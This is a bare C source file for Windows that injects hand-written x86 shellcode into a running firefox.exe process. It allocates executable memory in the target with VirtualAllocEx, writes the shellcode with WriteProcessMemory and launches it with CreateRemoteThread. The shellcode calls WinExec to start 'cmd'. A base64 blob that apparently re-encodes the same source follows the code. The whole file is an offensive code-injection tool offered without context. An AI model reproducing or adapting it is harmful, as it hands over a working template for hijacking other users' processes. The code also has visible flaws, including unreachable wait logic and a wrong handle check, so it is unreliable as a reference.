#include <Windows.h>
#include <TlHelp32.h>
#include <stdio.h>

unsigned char shellcode[] = "\x8B\xDC"
"\x68\x63\x6D\x64\x20"
"\x8B\xC4"
"\x6A\x01"
"\x50"
"\xB8\x41\x2C\x9A\x77"
"\xFF\xD0"
"\x8B\xE3"
"\x5A"
"\xB8\x00\x00\x00\x00"
"\xFF\xD0";

void PrepareShellcode(void)
{
	unsigned long KernelAddr;
	unsigned long WinExecAddr;
	unsigned long ExitProcessAddr;
	DWORD oldProtect;

	KernelAddr = (unsigned long)GetModuleHandle(TEXT("Kernel32"));
	WinExecAddr = (unsigned long)GetProcAddress((HMODULE)KernelAddr, "WinExec");
	ExitProcessAddr = (unsigned long)GetProcAddress((HMODULE)KernelAddr, "ExitProcess");

	*(DWORD *)(shellcode + 13) = WinExecAddr;
	*(DWORD *)(shellcode + 23) = ExitProcessAddr;

	VirtualProtect(shellcode, sizeof(shellcode), PAGE_EXECUTE_READWRITE, &oldProtect);
}

DWORD GetPID(LPTSTR lpProcess)
{
	PROCESSENTRY32 pe32;
	HANDLE snapshot = NULL;
	HANDLE hProcess = NULL;
	DWORD ProcessID = 0;

	if ((snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0)) != INVALID_HANDLE_VALUE)
	{
		RtlZeroMemory(&pe32, sizeof(PROCESSENTRY32));
		pe32.dwSize = sizeof(PROCESSENTRY32);
		Process32First(snapshot, &pe32);
		do
		{
			if (lstrcmp(pe32.szExeFile, lpProcess) == 0)
			{
				ProcessID = pe32.th32ProcessID;
				break;
			}
		} while (Process32Next(snapshot, &pe32));
	}
		
	CloseHandle(snapshot);
	return ProcessID;
}

void Inject(HANDLE hProcess)
{
	PVOID	pRemoteShellcode = NULL;
	HANDLE	hRemoteThread = NULL;
	DWORD	dwRemoteThreadID = 0;
	DWORD	dwInjectStatus = 0;

	PrepareShellcode();
	
	__try
	{
		int size = sizeof(shellcode);

		pRemoteShellcode = VirtualAllocEx(hProcess, NULL, size, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
		if (pRemoteShellcode == NULL)
		{
			return;
		}

		WriteProcessMemory(hProcess, pRemoteShellcode, shellcode, size, NULL);

		hRemoteThread = CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)pRemoteShellcode, NULL, 0, &dwRemoteThreadID);
		if (hRemoteThread == NULL)
		{
			printf("CreateRemoteThread failed. Last error: %x\n", GetLastError());
			__leave;

			WaitForSingleObject(hRemoteThread, INFINITE);
			GetExitCodeThread(hRemoteThread, &dwInjectStatus);
		}
	}
	__finally
	{
		if (!dwInjectStatus)
		{
			printf("Injection failed\n");
			VirtualFreeEx(hProcess, pRemoteShellcode, 0, MEM_RELEASE);

			if (hRemoteThread != NULL)
			{
				CloseHandle(hRemoteThread);
			}
		}
	}
}

int main()
{
	DWORD ProcessID;
	HANDLE hProcess;

	ProcessID = GetPID(TEXT("firefox.exe"));
	hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, ProcessID);

	if (hProcess != INVALID_HANDLE_VALUE)
	{
		Inject(hProcess);
		CloseHandle(hProcess);
	}
	return 0;
}

I2luY2x1ZGUgPFdpbmRvd3MuaD4KI2luY2x1ZGUgPFRsSGVscDMyLmg+CiNpbmNsdWRlIDxzdGRpby5oPgoKdW5zaWduZWQgY2hhciBzaGVsbGNvZGVbXSA9ICJceDhCXHhEQyIKIlx4NjhceDYzXHg2RFx4NjRceDIwIgoiXHg4Qlx4QzQiCiJceDZBXHgwMSIKIlx4NTAiCiJceEI4XHg0MVx4MkNceDlBXHg3NyIKIlx4RkZceEQwIgoiXHg4Qlx4RTMiCiJceDVBIgoiXHhCOFx4MDBceDAwXHgwMFx4MDAiCiJceEZGXHhEMCI7Cgp2b2lkIFByZXBhcmVTaGVsbGNvZGUodm9pZCkKewoJdW5zaWduZWQgbG9uZyBLZXJuZWxBZGRyOwoJdW5zaWduZWQgbG9uZyBXaW5FeGVjQWRkcjsKCXVuc2lnbmVkIGxvbmcgRXhpdFByb2Nlc3NBZGRyOwoJRFdPUkQgb2xkUHJvdGVjdDsKCglLZXJuZWxBZGRyID0gKHVuc2lnbmVkIGxvbmcpR2V0TW9kdWxlSGFuZGxlKFRFWFQoIktlcm5lbDMyIikpOwoJV2luRXhlY0FkZHIgPSAodW5zaWduZWQgbG9uZylHZXRQcm9jQWRkcmVzcygoSE1PRFVMRSlLZXJuZWxBZGRyLCAiV2luRXhlYyIpOwoJRXhpdFByb2Nlc3NBZGRyID0gKHVuc2lnbmVkIGxvbmcpR2V0UHJvY0FkZHJlc3MoKEhNT0RVTEUpS2VybmVsQWRkciwgIkV4aXRQcm9jZXNzIik7CgoJKihEV09SRCAqKShzaGVsbGNvZGUgKyAxMykgPSBXaW5FeGVjQWRkcjsKCSooRFdPUkQgKikoc2hlbGxjb2RlICsgMjMpID0gRXhpdFByb2Nlc3NBZGRyOwoKCVZpcnR1YWxQcm90ZWN0KHNoZWxsY29kZSwgc2l6ZW9mKHNoZWxsY29kZSksIFBBR0VfRVhFQ1VURV9SRUFEV1JJVEUsICZvbGRQcm90ZWN0KTsKfQoKRFdPUkQgR2V0UElEKExQVFNUUiBscFByb2Nlc3MpCnsKCVBST0NFU1NFTlRSWTMyIHBlMzI7CglIQU5ETEUgc25hcHNob3QgPSBOVUxMOwoJSEFORExFIGhQcm9jZXNzID0gTlVMTDsKCURXT1JEIFByb2Nlc3NJRCA9IDA7CgoJaWYgKChzbmFwc2hvdCA9IENyZWF0ZVRvb2xoZWxwMzJTbmFwc2hvdChUSDMyQ1NfU05BUFBST0NFU1MsIDApKSAhPSBJTlZBTElEX0hBTkRMRV9WQUxVRSkKCXsKCQlSdGxaZXJvTWVtb3J5KCZwZTMyLCBzaXplb2YoUFJPQ0VTU0VOVFJZMzIpKTsKCQlwZTMyLmR3U2l6ZSA9IHNpemVvZihQUk9DRVNTRU5UUlkzMik7CgkJUHJvY2VzczMyRmlyc3Qoc25hcHNob3QsICZwZTMyKTsKCQlkbwoJCXsKCQkJaWYgKGxzdHJjbXAocGUzMi5zekV4ZUZpbGUsIGxwUHJvY2VzcykgPT0gMCkKCQkJewoJCQkJUHJvY2Vzc0lEID0gcGUzMi50aDMyUHJvY2Vzc0lEOwoJCQkJYnJlYWs7CgkJCX0KCQl9IHdoaWxlIChQcm9jZXNzMzJOZXh0KHNuYXBzaG90LCAmcGUzMikpOwoJfQoJCQoJQ2xvc2VIYW5kbGUoc25hcHNob3QpOwoJcmV0dXJuIFByb2Nlc3NJRDsKfQoKdm9pZCBJbmplY3QoSEFORExFIGhQcm9jZXNzKQp7CglQVk9JRAlwUmVtb3RlU2hlbGxjb2RlID0gTlVMTDsKCUhBTkRMRQloUmVtb3RlVGhyZWFkID0gTlVMTDsKCURXT1JECWR3UmVtb3RlVGhyZWFkSUQgPSAwOwoJRFdPUkQJZHdJbmplY3RTdGF0dXMgPSAwOwoKCVByZXBhcmVTaGVsbGNvZGUoKTsKCQoJX190cnkKCXsKCQlpbnQgc2l6ZSA9IHNpemVvZihzaGVsbGNvZGUpOwoKCQlwUmVtb3RlU2hlbGxjb2RlID0gVmlydHVhbEFsbG9jRXgoaFByb2Nlc3MsIE5VTEwsIHNpemUsIE1FTV9DT01NSVQsIFBBR0VfRVhFQ1VURV9SRUFEV1JJVEUpOwoJCWlmIChwUmVtb3RlU2hlbGxjb2RlID09IE5VTEwpCgkJewoJCQlyZXR1cm47CgkJfQoKCQlXcml0ZVByb2Nlc3NNZW1vcnkoaFByb2Nlc3MsIHBSZW1vdGVTaGVsbGNvZGUsIHNoZWxsY29kZSwgc2l6ZSwgTlVMTCk7CgoJCWhSZW1vdGVUaHJlYWQgPSBDcmVhdGVSZW1vdGVUaHJlYWQoaFByb2Nlc3MsIE5VTEwsIDAsIChMUFRIUkVBRF9TVEFSVF9ST1VUSU5FKXBSZW1vdGVTaGVsbGNvZGUsIE5VTEwsIDAsICZkd1JlbW90ZVRocmVhZElEKTsKCQlpZiAoaFJlbW90ZVRocmVhZCA9PSBOVUxMKQoJCXsKCQkJcHJpbnRmKCJDcmVhdGVSZW1vdGVUaHJlYWQgZmFpbGVkLiBMYXN0IGVycm9yOiAleFxuIiwgR2V0TGFzdEVycm9yKCkpOwoJCQlfX2xlYXZlOwoKCQkJV2FpdEZvclNpbmdsZU9iamVjdChoUmVtb3RlVGhyZWFkLCBJTkZJTklURSk7CgkJCUdldEV4aXRDb2RlVGhyZWFkKGhSZW1vdGVUaHJlYWQsICZkd0luamVjdFN0YXR1cyk7CgkJfQoJfQoJX19maW5hbGx5Cgl7CgkJaWYgKCFkd0luamVjdFN0YXR1cykKCQl7CgkJCXByaW50ZigiSW5qZWN0aW9uIGZhaWxlZFxuIik7CgkJCVZpcnR1YWxGcmVlRXgoaFByb2Nlc3MsIHBSZW1vdGVTaGVsbGNvZGUsIDAsIE1FTV9SRUxFQVNFKTsKCgkJCWlmIChoUmVtb3RlVGhyZWFkICE9IE5VTEwpCgkJCXsKCQkJCUNsb3NlSGFuZGxlKGhSZW1vdGVUaHJlYWQpOwoJCQl9CgkJfQoJfQp9CgppbnQgbWFpbigpCnsKCURXT1JEIFByb2Nlc3NJRDsKCUhBTkRMRSBoUHJvY2VzczsKCglQcm9jZXNzSUQgPSBHZXRQSUQoVEVYVCgiZmlyZWZveC5leGUiKSk7CgloUHJvY2VzcyA9IE9wZW5Qcm9jZXNzKFBST0NFU1NfQUxMX0FDQ0VTUywgRkFMU0UsIFByb2Nlc3NJRCk7CgoJaWYgKGhQcm9jZXNzICE9IElOVkFMSURfSEFORExFX1ZBTFVFKQoJewoJCUluamVjdChoUHJvY2Vzcyk7CgkJQ2xvc2VIYW5kbGUoaFByb2Nlc3MpOwoJfQoJcmV0dXJuIDA7Cn0=